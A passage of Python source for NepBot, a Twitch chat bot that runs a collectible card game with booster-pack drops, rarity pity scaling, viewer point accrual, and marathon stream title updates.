"Couldn't remove %d of waifu %s at rarity %s from user %s as they don't own it/that many!" % (
amount, str(id), str(rarity), str(userid)))
def logDrop(userid, waifuid, rarity, source, channel, isWhisper):
trueChannel = "$$whisper$$" if isWhisper else channel
cur = db.cursor()
cur.execute("INSERT INTO drops(userid, waifuid, rarity, source, channel, timestamp) VALUES(%s, %s, %s, %s, %s, %s)",
(userid, waifuid, rarity, source, trueChannel, current_milli_time()))
cur.close()
def formatRank(rankNum):
if (rankNum % 100) // 10 == 1 or rankNum % 10 == 0 or rankNum % 10 > 3:
return "%dth" % rankNum
elif rankNum % 10 == 1:
return "%dst" % rankNum
elif rankNum % 10 == 2:
return "%dnd" % rankNum
else:
return "%drd" % rankNum
memes = ["🤔", "🏆", "✌", "🌲", "🍀", "🖐", "👌", "🤑", "🤣", "🎄"]
def formatTimeDelta(ms):
baseRepr = str(datetime.timedelta(milliseconds=int(ms), microseconds=0))
output = baseRepr[:-3] if "." in baseRepr else baseRepr
if "memeMode" in config and config["memeMode"] == "meme":
for i in range(10):
output = output.replace(str(i), memes[i])
return output
def parseRarity(input):
try:
rarity = int(input)
except Exception:
if input.lower() in revrarity:
rarity = revrarity[input.lower()]
else:
raise ValueError(input)
if rarity < 0 or rarity >= int(config["numNormalRarities"]) + int(config["numSpecialRarities"]):
raise ValueError(input)
return rarity
def parseBetTime(input):
match = time_regex.fullmatch(input)
if not match:
return None
bet = match.groupdict()
if bet["ms"] is None:
bet["ms"] = "0"
ms = int(bet["ms"] + ("0" * max(3 - len(bet["ms"]), 0)))
total = int(bet["hours"]) * 3600000 + int(bet["minutes"]) * 60000 + int(bet["seconds"]) * 1000 + ms
return {"hours": total // 3600000, "minutes": (total // 60000) % 60, "seconds": (total // 1000) % 60,
"ms": total % 1000, "total": total}
class CardNotInHandException(Exception):
pass
class CardRarityNotInHandException(CardNotInHandException):
pass
class AmbiguousRarityException(Exception):
pass
# given a string specifying a card id + optional rarity, return id+rarity of the hand card matching it
# throw various exceptions for invalid format / card not in hand / ambiguous rarity
def parseHandCardSpecifier(hand, specifier):
if "-" in specifier:
id = int(specifier.split("-", 1)[0])
rarity = parseRarity(specifier.split("-", 1)[1])
foundID = False
for waifu in hand:
if waifu['id'] == id and waifu['rarity'] == rarity:
# done
return {"id": id, "base_rarity": waifu['base_rarity'], "rarity": rarity}
elif waifu['id'] == id:
foundID = True
if foundID:
raise CardRarityNotInHandException()
else:
raise CardNotInHandException()
else:
id = int(specifier)
rarity = None
base_rarity = None
for waifu in hand:
if waifu['id'] == id:
if rarity is None:
rarity = waifu['rarity']
base_rarity = waifu['base_rarity']
else:
raise AmbiguousRarityException()
if rarity is None:
raise CardNotInHandException()
else:
return {"id": id, "base_rarity": base_rarity, "rarity": rarity}
class InvalidBoosterException(Exception):
pass
class CantAffordBoosterException(Exception):
def __init__(self, cost):
super(CantAffordBoosterException, self).__init__()
self.cost = cost
def getPackStats(userid):
with db.cursor() as cur:
cur.execute(
"SELECT bo.boostername, COUNT(*) FROM (SELECT * FROM boosters_opened WHERE userid = %s UNION SELECT * FROM archive_boosters_opened WHERE userid = %s) AS bo JOIN boosters ON (bo.boostername IN(boosters.name, CONCAT('mega', boosters.name))) WHERE boosters.cost > 0 GROUP BY bo.boostername ORDER BY COUNT(*) DESC",
[userid] * 2)
packstats = cur.fetchall()
return packstats
def getSpendings(userid):
with db.cursor() as cur:
cur.execute("SELECT spending FROM users WHERE id = %s", [userid])
result = cur.fetchall()
return int(result[0][0])
def getHandUpgradeLUT():
with db.cursor() as cur:
cur.execute("SELECT slot, spendings FROM handupgrades")
lut = cur.fetchall()
return lut
def getNextUpgradeSpendings(userid):
lut = getHandUpgradeLUT()
currSlots = paidHandUpgrades(userid)
paidSlots = currSlots
nextSpendings = 0
while currSlots >= len(lut) - 1:
currSlots -= 1
nextSpendings += 1000000
nextSpendings += lut[currSlots + 1][1]
return nextSpendings
def checkHandUpgrade(userid):
userid = int(userid)
nextSpendings = getNextUpgradeSpendings(userid)
spendings = getSpendings(userid)
logger.debug("next spendings: %d", nextSpendings)
logger.debug("current spendings: %d", spendings)
if spendings >= nextSpendings:
upgradeHand(userid)
logger.debug("Upgraded Hand for %d", userid)
return True
return False
def messageForHandUpgrade(userid, username, bot, channel, isWhisper):
bot.message(channel, "%s, you just got a new hand space from booster spending! naroYay" % username, isWhisper)
def addSpending(userid, amount):
with db.cursor() as cur:
cur.execute("UPDATE users SET spending=spending + %s WHERE id = %s", [amount, userid])
def openBooster(bot, userid, username, display_name, channel, isWhisper, packname, buying=True, mega=False):
with db.cursor() as cur:
rarityColumns = ", ".join(
"rarity" + str(i) + "UpgradeChance" for i in range(int(config["numNormalRarities"]) - 1))
if buying:
cur.execute(
"SELECT listed, buyable, cost, numCards, guaranteeRarity, guaranteeCount, useEventWeightings, maxEventTokens, eventTokenChance, canMega, " + rarityColumns + " FROM boosters WHERE name = %s AND buyable = 1",
[packname])
else:
cur.execute(
"SELECT listed, buyable, cost, numCards, guaranteeRarity, guaranteeCount, useEventWeightings, maxEventTokens, eventTokenChance, canMega, " + rarityColumns + " FROM boosters WHERE name = %s",
[packname])
packinfo = cur.fetchone()
if packinfo is None:
raise InvalidBoosterException()
listed = packinfo[0]
buyable = packinfo[1]
cost = packinfo[2]
numCards = packinfo[3]
pgRarity = packinfo[4]
pgCount = packinfo[5]
useEventWeightings = packinfo[6] != 0
numTokens = packinfo[7]
tokenChance = packinfo[8]
canMega = packinfo[9]
normalChances = packinfo[10:]
if numTokens >= numCards:
raise InvalidBoosterException()
iterations = 1
if mega:
if not canMega:
raise InvalidBoosterException()
iterations = 5
if buying:
if not hasPoints(userid, cost*iterations):
raise CantAffordBoosterException(cost*iterations)
addPoints(userid, -cost*iterations)
minScalingRarity = int(config["pullScalingMinRarity"])
maxScalingRarity = int(config["pullScalingMaxRarity"])
numScalingRarities = maxScalingRarity - minScalingRarity + 1
scalingThresholds = [int(config["pullScalingRarity%dThreshold" % rarity]) for rarity in
range(minScalingRarity, maxScalingRarity + 1)]
cur.execute("SELECT pullScalingData FROM users WHERE id = %s", [userid])
scalingRaw = cur.fetchone()[0]
if scalingRaw is None:
scalingData = [0] * numScalingRarities
else:
scalingData = [int(n) for n in scalingRaw.split(':')]
totalTokensDropped = 0
cards = []
alertwaifus = []
uniques = getUniqueCards(userid)
totalDE = 0
logPackName = "mega" + packname if mega else packname
for iter in range(iterations):
tokensDropped = 0
for n in range(numTokens):
if random.random() < tokenChance:
tokensDropped += 1
totalTokensDropped += tokensDropped
iterDE = 0
for i in range(numCards - tokensDropped):
# scale chances of the card appropriately
currentChances = list(normalChances)
guaranteedRarity = 0
if listed and buyable:
for rarity in range(maxScalingRarity, minScalingRarity - 1, -1):
scaleIdx = rarity - minScalingRarity
if scalingData[scaleIdx] >= scalingThresholds[scaleIdx] * 2:
# guarantee this rarity drops now
if rarity == int(config["numNormalRarities"]) - 1:
currentChances = [1] * len(currentChances)
else:
currentChances = ([1] * rarity) + [
functools.reduce((lambda x, y: x * y), currentChances[:rarity + 1])] + list(
currentChances[rarity + 1:])
guaranteedRarity = rarity
break
elif scalingData[scaleIdx] > scalingThresholds[scaleIdx]:
# make this rarity more likely to drop
oldPromoChance = currentChances[rarity - 1]
currentChances[rarity - 1] = min(currentChances[rarity - 1] * (
(scalingData[scaleIdx] / scalingThresholds[scaleIdx] - 1) * 2 + 1), 1)
if rarity != int(config["numNormalRarities"]) - 1:
# make rarities above this one NOT more likely to drop
currentChances[rarity] /= currentChances[rarity - 1] / oldPromoChance
# account for minrarity for some cards in the pack
if i < pgCount and pgRarity > guaranteedRarity:
if pgRarity == int(config["numNormalRarities"]) - 1:
currentChances = [1] * len(currentChances)
else:
currentChances = ([1] * pgRarity) + [
functools.reduce((lambda x, y: x * y), currentChances[:pgRarity + 1])] + list(
currentChances[pgRarity + 1:])
# actually drop the card
logger.debug("using odds for card %d: %s", i, str(currentChances))
card = int(dropCard(upgradeChances=currentChances, useEventWeightings=useEventWeightings,
bannedCards=uniques + cards))
cards.append(card)
# check its rarity and adjust scaling data
waifu = getWaifuById(card)
iterDE += int(config["rarity%dValue" % waifu['base_rarity']])
if waifu['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
alertwaifus.append(waifu)
if listed and buyable:
for r in range(numScalingRarities):
if r + minScalingRarity != waifu['base_rarity']:
scalingData[r] += cost / (numCards - tokensDropped)
else:
scalingData[r] = 0
logDrop(str(userid), str(card), waifu['base_rarity'], "boosters.%s" % logPackName, channel, isWhisper)
totalDE += iterDE
# did they win a free amount-based reward pack?
if packname in packAmountRewards and iterDE in packAmountRewards[packname]:
reward = packAmountRewards[packname][iterDE]
giveFreeBooster(userid, reward)
msgArgs = (reward, packname, iterDE, reward)
bot.message("#%s" % username, "You won a free %s pack due to getting a %s pack worth %d points. Open it with !freepacks open %s" % msgArgs, True)
cards.sort()
recordPullMetrics(*cards)
addSpending(userid, cost*iterations)
# pity pull data update
cur.execute("UPDATE users SET pullScalingData = %s, eventTokens = eventTokens + %s WHERE id = %s",
[":".join(str(round(n)) for n in scalingData), totalTokensDropped, userid])
# insert opened booster
cur.execute(
"INSERT INTO boosters_opened (userid, boostername, paid, created, status, eventTokens) VALUES(%s, %s, %s, %s, 'open', %s)",
[userid, logPackName, cost if buying else 0, current_milli_time(), totalTokensDropped])
boosterid = cur.lastrowid
cur.executemany("INSERT INTO boosters_cards (boosterid, waifuid) VALUES(%s, %s)",
[(boosterid, card) for card in cards])
# alerts
alertname = display_name if display_name.lower() == username.lower() else "%s (%s)" % (display_name, username)
for w in alertwaifus:
threading.Thread(target=sendDrawAlert, args=(channel, w, alertname)).start()
return boosterid
def giveFreeBooster(userid, boostername, amount=1):
with db.cursor() as cur:
cur.execute("INSERT INTO freepacks (userid, boostername, remaining, total) VALUES(%s, %s, %s, %s)"
+ " ON DUPLICATE KEY UPDATE remaining = remaining + %s, total = total + %s",
[userid, boostername, amount, amount, amount, amount])
def infoCommandAvailable(userid, username, displayName, bot, channel, isWhisper):
with db.cursor() as cur:
private = isWhisper or channel == '#' + config['username'] or channel == '#' + username
columnName = "Private" if private else "Public"
cur.execute("SELECT infoUsed{0}, infoLastReset{0} FROM users WHERE id = %s".format(columnName), [userid])
limitData = list(cur.fetchone())
timeUntilReset = limitData[1] - (current_milli_time() - int(config["infoResetPeriod"]) * 60000)
if timeUntilReset <= 0:
limitData[0] = 0
cur.execute("UPDATE users SET infoUsed{0} = 0, infoLastReset{0} = %s WHERE id = %s".format(columnName),
[current_milli_time(), userid])
limit = int(config["infoLimit%s" % columnName])
if limitData[0] < limit:
return True
else:
timeDiff = formatTimeDelta(timeUntilReset)
if private:
bot.message(channel,
"%s, you have hit the rate limit for info commands. Please wait %s to use more." % (
displayName, timeDiff), isWhisper)
else:
bot.message(channel,
"%s, you have hit the rate limit for info commands in public chats. Please wait %s to use more or use them via whisper or in the bot's own chat." % (
displayName, timeDiff), isWhisper)
return False
def useInfoCommand(userid, username, channel, isWhisper):
with db.cursor() as cur:
private = isWhisper or channel == '#' + config['username'] or channel == '#' + username
columnName = "Private" if private else "Public"
cur.execute("UPDATE users SET infoUsed{0} = infoUsed{0} + 1 WHERE id = %s".format(columnName), [userid])
def generateRewardsSeed(cycleLength, numGoodRewards):
# generate a reasonable rewards seed
# "reasonable" is defined as the gap between successive good rewards
# being between (CL/NumGood)/2 and (CL/NumGood)*2 every time
# where gap is 1, not 0, for two consecutive good rewards
# uses 0 to (numGoodRewards-1) to represent the good rewards
# and other numbers to represent the bad
hasSeed = False
while not hasSeed:
seed = random.randrange(0, 0x10000000000000000)
if numGoodRewards == 0 or cycleLength == numGoodRewards:
return seed
generator = random.Random(seed)
order = [x for x in range(cycleLength)]
generator.shuffle(order)
hasSeed = True
lastPos = -1
for i in range(int(numGoodRewards)):
pos = lastPos + 1
while order[pos] >= numGoodRewards:
pos += 1
if pos - lastPos <= (cycleLength/numGoodRewards)/2 or pos - lastPos >= (cycleLength/numGoodRewards)*2:
hasSeed = False
break
lastPos = pos
if cycleLength - lastPos >= (cycleLength/numGoodRewards)*2:
hasSeed = False
return seed
# returns (cycle length, number of good rewards) for use elsewhere
def getRewardsMetadata():
with db.cursor() as cur:
cur.execute("SELECT COUNT(*), SUM(IF(is_good != 0, 1, 0)) FROM free_rewards")
return cur.fetchone()
# From https://github.com/Shizmob/pydle/issues/35
class PrivMessageTagSupport(pydle.features.ircv3.TaggedMessageSupport):
def on_raw_privmsg(self, message):
""" PRIVMSG command. """
nick, metadata = self._parse_user(message.source)
tags = message.tags
target, message = message.params
self._sync_user(nick, metadata)
self.on_message(target, nick, message, tags)
if self.is_channel(target):
self.on_channel_message(target, nick, message, tags)
else:
self.on_private_message(nick, message, tags)
# End Github code
NepBotClass = pydle.featurize(pydle.Client, PrivMessageTagSupport)
class NepBot(NepBotClass):
config = {}
mychannels = []
instance = None
autoupdate = False
pw = None
nomodalerted = []
addchannels = []
leavechannels = []
emotecooldowns = {}
def __init__(self, config, channels):
super().__init__(config["username"])
self.config = config
self.mychannels = channels
NepBot.instance = self
def on_clearchat(self, message):
# print("Got clear chat message: " + str(message))
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
logger.debug(
"nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata,
params=params, tags=tags))
if len(params) == 1:
logger.info("Chat in %s has been cleared by a moderator.", params[0])
return
u = params[1]
chan = params[0]
reason = "" if "ban-reason" not in tags else str(tags["ban-reason"]).replace("\\s", " ")
if "ban-duration" in tags.keys():
duration = tags["ban-duration"]
logger.info("%s got timed out for %s seconds in %s for: %s", u, duration, chan, reason)
else:
logger.info("%s got permanently banned from %s. Reason: %s", u, chan, reason)
return
def on_hosttarget(self, message):
# print("Got Host Target: " + str(message))
parts = str(message).split(" ")
sourcechannel = parts[2].strip("#")
target = parts[3].strip(":")
if target == "-":
logger.info("%s has stopped hosting", sourcechannel)
else:
logger.info("%s is now hosting %s", sourcechannel, target)
return
def on_userstate(self, message):
# print("Userstate...")
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
logger.debug(
"nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata,
params=params, tags=tags))
if config["username"].lower() == "nepnepbot" and tags["display-name"] == "Nepnepbot" and params[
0] != "#nepnepbot" and tags["mod"] != '1' and params[0] not in self.nomodalerted:
logger.info("No Mod in %s!", str(params[0]))
self.nomodalerted.append(params[0])
self.message(params[0], "Hey! I noticed i am not a mod here! Please do mod me to avoid any issues!")
return
def on_roomstate(self, message):
# print("Got Room State: " + str(message))
return
def on_raw_421(self, message):
# print("Got raw 421:" + str(message))
# Ignore twitch not knowing WHOIS
if str(message).find("WHOIS") > -1:
return
super().on_raw_421(message)
def on_whisper(self, message):
nick, metadata = self._parse_user(message.source)
tags = message.tags
params = message.params
# print("WHISPER received: nick: {nick}; metadata: {metadata}; params: {params}; tags: {tags}".format(nick=nick, metadata=metadata, params=params, tags=tags))
self.on_message("#" + str(nick), str(nick), str(params[1]), tags, isWhisper=True)
def on_unknown(self, message):
if str(message).find("WHISPER") > -1:
self.on_whisper(message)
return
if str(message).find("CLEARCHAT") > -1:
self.on_clearchat(message)
return
if str(message).find("HOSTTARGET") > -1:
self.on_hosttarget(message)
return
if str(message).find("USERSTATE") > -1:
self.on_userstate(message)
return
if str(message).find("ROOMSTATE") > -1:
self.on_roomstate(message)
return
if str(message).find("USERNOTICE") > -1:
logger.info("PogChamp! Someone subbed to someone! here's the message: %s", str(message))
return
super().on_unknown(message)
def start(self, password):
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=password)
self.pw = password
logger.info("Connecting...")
def timer():
with busyLock:
global t
t = Timer(int(config["cycleLength"]), timer)
t.start()
logger.debug("Refreshing Database Connection...")
global db
try:
db.close()
except Exception:
logger.warning("Error closing db connection cleanly, ignoring.")
try:
db = pymysql.connect(host=dbhost, user=dbuser, passwd=dbpw, db=dbname, autocommit="True",
charset="utf8mb4")
except Exception:
logger.error("Error Reconnecting to DB. Skipping Timer Cycle.")
return
with db.cursor() as cur:
# open packs?
cur.execute(
"SELECT boosters_opened.id, boosters_opened.userid, users.name FROM boosters_opened JOIN users ON boosters_opened.userid = users.id WHERE status = 'open' AND created <= %s",
[current_milli_time() - int(config["boosterTimeout"])])
packsToClose = cur.fetchall()
for pack in packsToClose:
userid = pack[1]
cur.execute("SELECT waifuid FROM boosters_cards WHERE boosterid = %s ORDER BY waifuid ASC",
[pack[0]])
cardIDs = [row[0] for row in cur.fetchall()]
cards = [getWaifuById(card) for card in cardIDs]
# keep the best cards
cards.sort(key=lambda waifu: -waifu['base_rarity'])
numKeep = int(min(max(handLimit(userid) - currentCards(userid), 0), len(cards)))
keeps = cards[:numKeep]
des = cards[numKeep:]
logger.info("Expired pack for user %s (%d): keeping %s, disenchanting %s", pack[2], userid,
str(keeps), str(des))
for waifu in keeps:
giveCard(userid, waifu['id'], waifu['base_rarity'])
gottenpoints = 0
for waifu in des:
baseValue = int(config["rarity" + str(waifu['base_rarity']) + "Value"])
profit = attemptBountyFill(self, waifu['id'])
gottenpoints += baseValue + profit
addPoints(userid, gottenpoints)
attemptPromotions(*cardIDs)
cur.execute("UPDATE boosters_opened SET status='closed', updated = %s WHERE id = %s",
[current_milli_time(), pack[0]])
# increase weightings
if int(config["last_weighting_update"]) < current_milli_time() - int(
config["weighting_increase_cycle"]):
logger.debug("Increasing card weightings...")
baseIncrease = float(config["weighting_increase_amount"])
cur.execute("UPDATE waifus SET normal_weighting = normal_weighting * %s WHERE base_rarity < %s",
[baseIncrease, int(config["strongerWeightingMinRarity"])])
cur.execute("UPDATE waifus SET normal_weighting = normal_weighting * %s WHERE base_rarity BETWEEN %s AND %s",
[baseIncrease**2, int(config["strongerWeightingMinRarity"]), int(config["numNormalRarities"])-1])
config["last_weighting_update"] = str(current_milli_time())
cur.execute("UPDATE config SET value = %s WHERE name = 'last_weighting_update'",
[config["last_weighting_update"]])
# pudding expiry?
now = datetime.datetime.now()
ymdNow = now.strftime("%Y-%m-%d")
if ymdNow > config["last_pudding_check"]:
logger.debug("Processing pudding expiry...")
config["last_pudding_check"] = ymdNow
cur.execute("UPDATE config SET value = %s WHERE name = 'last_pudding_check'", [ymdNow])
if now.day == 1:
# move pudding down a category, alert people with expiring pudding
cur.execute("UPDATE users SET puddingExpiring = puddingPrevious, puddingPrevious = puddingCurrent, puddingCurrent = 0")
cur.execute("SELECT name, puddingExpiring FROM users WHERE puddingExpiring > 0")
for userRow in cur.fetchall():
self.message("#%s" % userRow[0], "You have %d pudding expiring on the 8th of this month. !pudding to see your balance and to spend it." % userRow[1], True)
elif now.day == 8:
# actually expire pudding from 2 months ago
cur.execute("UPDATE users SET puddingExpiring = 0")
logger.debug("Checking live status of channels...")
checkAndRenewAppAccessToken()
with busyLock:
cur = db.cursor()
cur.execute("SELECT users.name, users.id FROM channels JOIN users ON channels.name = users.name")
rows = cur.fetchall()
cur.close()
channelids = []
idtoname = {}
isLive = {}
viewerCount = {}
for row in rows:
channelids.append(str(row[1]))
idtoname[str(row[1])] = row[0]
isLive[str(row[0])] = False
while len(channelids) > 0:
currentSlice = channelids[:100]
response = requests.get("https://api.twitch.tv/helix/streams", headers=headers,
params={"type": "live", "user_id": currentSlice})
data = response.json()["data"]
for element in data:
chanName = idtoname[str(element["user_id"])]
isLive[chanName] = True
logger.debug("%s is live!", idtoname[str(element["user_id"])])
viewerCount[chanName] = element["viewer_count"]
channelids = channelids[100:]
marathonLive = config['marathonChannel'][1:] in viewerCount
logger.debug("Catching all viewers...")
for c in self.addchannels:
self.mychannels.append(c)
self.addchannels = []
for c in self.leavechannels:
try:
self.mychannels.remove(c)
except Exception:
logger.warning("Couldn't remove channel %s from channels, it wasn't found. Channel list: %s",
str(c), str(self.mychannels))
self.leavechannels = []
try:
# print("Activitymap: " + str(activitymap))
doneusers = []
validactivity = []
for channel in self.channels:
# print("Fetching for channel " + str(channel))
channelName = str(channel).replace("#", "")
try:
a = []
if channelName in viewerCount and viewerCount[channelName] >= 800:
logger.debug("%s had more than 800 viewers, catching from chatters endpoint", channelName)
with urllib.request.urlopen(
'https://tmi.twitch.tv/group/user/' + channelName + '/chatters') as response:
data = json.loads(response.read().decode())
chatters = data["chatters"]
a = chatters["moderators"] + chatters["staff"] + chatters["admins"] + chatters[
"global_mods"] + chatters["viewers"]
else:
logger.debug("Users in %s: %s", channel, self.channels[channel]['users'])
for viewer in self.channels[channel]['users']:
a.append(viewer)
for viewer in a:
if viewer not in doneusers:
doneusers.append(viewer)
if isLive[channelName] and viewer not in validactivity:
validactivity.append(viewer)
except Exception:
logger.error("Error fetching chatters for %s, skipping their chat for this cycle" % channelName)
logger.error("Error: %s", str(sys.exc_info()))
# process all users
logger.debug("Caught users, giving points and creating accounts, amount to do = %d" % len(doneusers))
newUsers = []
maxPointsInactive = int(config["maxPointsInactive"])
overflowPoints = 0
while len(doneusers) > 0:
currentSlice = doneusers[:100]
with busyLock:
cur = db.cursor()
cur.execute("SELECT name, points, lastActiveTimestamp FROM users WHERE name IN(%s)" % ",".join(
["%s"] * len(currentSlice)), currentSlice)
foundUsersData = cur.fetchall()
cur.close()
foundUsers = [row[0] for row in foundUsersData]
newUsers += [user for user in currentSlice if user not in foundUsers]
if len(foundUsers) > 0:
updateData = []
for viewerInfo in foundUsersData:
pointGain = int(config["passivePoints"])
if viewerInfo[0] in activitymap and viewerInfo[0] in validactivity:
pointGain += max(10 - int(activitymap[viewerInfo[0]]), 0)
if viewerInfo[0] in marathonActivityMap and marathonActivityMap[viewerInfo[0]] < 10 and marathonLive:
altPointGain = int(config["passivePoints"]) + 10 - marathonActivityMap[viewerInfo[0]]
altPointGain = round(altPointGain * float(config["marathonPointsMultiplier"]))
pointGain = max(pointGain, altPointGain)
pointGain = int(pointGain * float(config["pointsMultiplier"]))
if viewerInfo[2] is None:
maxPointGain = max(maxPointsInactive - viewerInfo[1], 0)
if pointGain > maxPointGain:
overflowPoints += pointGain - maxPointGain
pointGain = maxPointGain
if pointGain > 0:
updateData.append((pointGain, viewerInfo[0]))
with busyLock:
cur = db.cursor()
cur.executemany("UPDATE users SET points = points + %s WHERE name = %s", updateData)
cur.close()
doneusers = doneusers[100:]
if overflowPoints > 0:
logger.debug("Paying %d overflow points to the bot account" % overflowPoints)
with busyLock:
cur = db.cursor()
cur.execute("UPDATE users SET points = points + %s WHERE name = %s",
[overflowPoints, config["username"]])
cur.close()
# now deal with user names that aren't already in the DB
if len(newUsers) > 10000:
logger.warning(
"DID YOU LET ME JOIN GDQ CHAT OR WHAT?!!? ... capping new user accounts at 10k. Sorry, bros!")
newUsers = newUsers[:10000]
while len(newUsers) > 0:
logger.debug("Adding new users...")
logger.debug("New users to add: %s", str(newUsers))
currentSlice = newUsers[:100]
r = requests.get("https://api.twitch.tv/helix/users", headers=headers,
params={"login": currentSlice})
if r.status_code == 429:
logger.warning("Rate Limit Exceeded! Skipping account creation!")
r.raise_for_status()
j = r.json()
if "data" not in j:
# error, what do?
r.raise_for_status()
currentIdMapping = {int(row["id"]): row["login"] for row in j["data"]}
logger.debug("currentIdMapping: %s", currentIdMapping)
foundIdsData = []
if len(currentIdMapping) > 0:
with busyLock:
cur = db.cursor()
cur.execute("SELECT id FROM users WHERE id IN(%s)" % ",".join(["%s"] * len(currentIdMapping)),
[id for id in currentIdMapping])
foundIdsData = cur.fetchall()
cur.close()
localIds = [row[0] for row in foundIdsData]
# users to update the names for (id already exists)
updateNames = [(currentIdMapping[id], id) for id in currentIdMapping if id in localIds]
if len(updateNames) > 0:
with busyLock:
logger.debug("Updating names...")
cur = db.cursor()
cur.executemany("UPDATE users SET name = %s WHERE id = %s", updateNames)
cur.close()
# new users (id does not exist)
newAccounts = [(id, currentIdMapping[id]) for id in currentIdMapping if id not in localIds]
if len(newAccounts) > 0:
with busyLock:
cur = db.cursor()
cur.executemany("INSERT INTO users (id, name, points, lastFree) VALUES(%s, %s, 0, 0)",
newAccounts)
cur.close()
# actually give points
updateData = []
for id in currentIdMapping:
viewer = currentIdMapping[id]
pointGain = int(config["passivePoints"])
if viewer in activitymap and viewer in validactivity:
pointGain += max(10 - int(activitymap[viewer]), 0)
if viewer in marathonActivityMap and marathonActivityMap[viewer] < 10 and marathonLive:
altPointGain = int(config["passivePoints"]) + 10 - marathonActivityMap[viewer]
altPointGain = round(altPointGain * float(config["marathonPointsMultiplier"]))
pointGain = max(pointGain, altPointGain)
pointGain = int(pointGain * float(config["pointsMultiplier"]))
updateData.append((pointGain, viewer))
with busyLock:
cur = db.cursor()
cur.executemany("UPDATE users SET points = points + %s WHERE name = %s", updateData)
cur.close()
# done with this slice
newUsers = newUsers[100:]
for user in activitymap:
activitymap[user] += 1
for user in marathonActivityMap:
marathonActivityMap[user] += 1
except Exception:
logger.warning("We had an error during passive point gain. skipping this cycle.")
logger.warning("Error: %s", str(sys.exc_info()))
logger.warning("Last run query: %s", cur._last_executed)
if self.autoupdate and booleanConfig("marathonBotFunctions"):
logger.debug("Updating Title and Game with horaro info")
schedule = getHoraro()
try:
data = schedule["data"]
ticker = data["ticker"]
current = ticker["current"]
wasNone = False
if current is None:
current = ticker["next"]
wasNone = True
current = current["data"]
game = current[0]
category = current[1]
runners = [getRawRunner(runner) for runner in current[2:6] if runner is not None]
args = {"game": game}
args["category"] = " (%s)" % category if category is not None else ""
args["comingup"] = "COMING UP: " if wasNone else ""
args["runners"] = (" by " + ", ".join(runners)) if len(runners) > 0 else ""
args["title"] = config["marathonTitle"]
args["command"] = config["marathonHelpCommand"]
title = "{comingup}{title} - {game}{category}{runners} - !{command} in chat".format(**args)
twitchGame = game
if len(current) >= 10 and current[-1] is not None:
twitchGame = current[-1]
updateBoth(twitchGame, title=title)
if len(runners) > 0:
thread.start_new_thread(MarathonBot.instance.updateFollowButtons, (runners,))
except Exception:
logger.warning("Error updating from Horaro. Skipping this cycle.")
logger.warning("Error: %s", str(sys.exc_info()))
if booleanConfig("marathonHelpAutopost"):
nextPost = int(config["marathonHelpAutopostLast"]) + int(config["marathonHelpAutopostPeriod"]) * 1000
if nextPost <= current_milli_time():
self.message(config["marathonChannel"], config["marathonHelpCommandText"], False)
config["marathonHelpAutopostLast"] = str(current_milli_time())
with busyLock:
with db.cursor() as cur:
cur.execute("UPDATE config SET value = %s WHERE name = 'marathonHelpAutopostLast'",
[config["marathonHelpAutopostLast"]])
if t is None:
timer()
def on_capability_twitch_tv_membership_available(self, nothing=None):
logger.debug("WE HAS TWITCH MEMBERSHIP AVAILABLE!")
return True
def on_capability_twitch_tv_membership_enabled(self, nothing=None):
logger.debug("WE HAS TWITCH MEMBERSHIP ENABLED!")
return
def on_capability_twitch_tv_tags_available(self, nothing=None):
logger.debug("WE HAS TAGS AVAILABLE!")
return True
def on_capability_twitch_tv_tags_enabled(self, nothing=None):
logger.debug("WE HAS TAGS ENABLED!")
return
def on_capability_twitch_tv_commands_available(self, nothing=None):
logger.debug("WE HAS COMMANDS AVAILABLE!")
return True
def on_capability_twitch_tv_commands_enabled(self, nothing=None):
logger.debug("WE HAS COMMANDS ENABLED!")
return
def on_disconnect(self, expected):
logger.error("Disconnected, reconnecting. Was it expected? %s", str(expected))
pool.connect(self, "irc.twitch.tv", 6667, tls=False, password=self.pw, reconnect=True)
def on_connect(self):
logger.info("Connected! joining channels...")
super().on_connect()
for channel in self.mychannels:
channel = channel.lower()
logger.debug("Joining %s...", channel)
self.join(channel)
def on_raw(self, message):
# print("Raw message: " + str(message))
super().on_raw(message)
def on_private_message(self, nick, message, tags):
super().on_private_message(nick, message)
return
def on_channel_message(self, target, nick, message, tags):
super().on_channel_message(target, nick, message)
return
def on_message(self, source, target, message, tags, isWhisper=False):
if isWhisper:
logger.debug("whisper: %s, %s", str(target), message)
else:
logger.debug("message: %s, %s, %s", str(source), str(target), message)
# print("Tags: " + str(tags))
sender = str(target).lower()
channelowner = str(source).lower().replace("#", "")
# verify tags
# do nothing if twitch id is somehow missing
if 'user-id' not in tags:
return
# failsafe since display-name can (very rarely) be null for certain Twitch accounts
if 'display-name' not in tags or not tags['display-name']:
tags['display-name'] = sender
activeCommands = ["checkhand", "points", "freewaifu", "de", "disenchant", "buy", "booster", "trade", "lookup",
"alerts", "redeem", "upgrade", "search", "promote", "bet", "sets", "set", "giveaway",
"bounty", "emotewar", "wars", "war", "vote", "profile", "owners", "freebie", "godimage",
"freepacks", "freepack", "pudding"]
if sender not in blacklist and "bot" not in sender:
activitymap[sender] = 0
activitymap[channelowner] = 0
isMarathonChannel = source == config['marathonChannel'] and not isWhisper
if isMarathonChannel:
marathonActivityMap[sender] = 0
with busyLock:
with db.cursor() as cur:
# War?
if int(config["emoteWarStatus"]) == 1:
if sender not in self.emotecooldowns:
self.emotecooldowns[sender] = defaultdict(int)
for emote in emotewaremotes:
if emote in message and self.emotecooldowns[sender][emote] <= current_milli_time() - 60000:
cur.execute("UPDATE emoteWar SET `count` = `count` + 1 WHERE name = %s", [emote])
self.emotecooldowns[sender][emote] = current_milli_time()
cur.execute("SELECT name FROM users WHERE id = %s", [tags['user-id']])
user = cur.fetchone()
if user is None:
cur.execute("INSERT INTO users (id, name, points) VALUE (%s, %s, %s)",
[tags['user-id'], sender, 0])
logger.info("%s didn't have an account, created it.", tags['display-name'])
elif user[0] != sender:
logger.info("%s got a new name, changing it to: %s", user[0], sender)
cur.execute("UPDATE users SET name = %s WHERE id = %s", [sender, tags['user-id']])
if message.startswith("!"):
parts = message.split()
command = parts[0][1:].lower()
if command in activeCommands:
with busyLock:
with db.cursor() as cur:
cur.execute(
